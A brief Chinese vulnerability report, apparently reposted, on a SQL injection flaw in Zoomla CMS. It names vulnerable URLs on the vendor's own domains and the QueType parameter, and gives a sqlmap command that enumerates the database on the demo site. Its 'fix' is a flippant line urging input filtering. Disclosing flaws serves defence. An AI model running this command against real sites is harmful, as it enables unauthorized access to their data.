逐浪cms通用型Sql注入漏洞及漏洞修复方案2014
Url:http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?QueType=
http://www.zoomla.cn/guest/Ask/MyAskList.aspx?QueType=
参数QueType
权限太大啊,妥妥低。
sqlmap.py -u "http://demo.zoomla.cn/Guest/Ask/MyAskList.aspx?
QueType=1" -v 1 --current-db
修复方案:
赶快过滤吧,黑客大牛们手下留情,哈哈
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;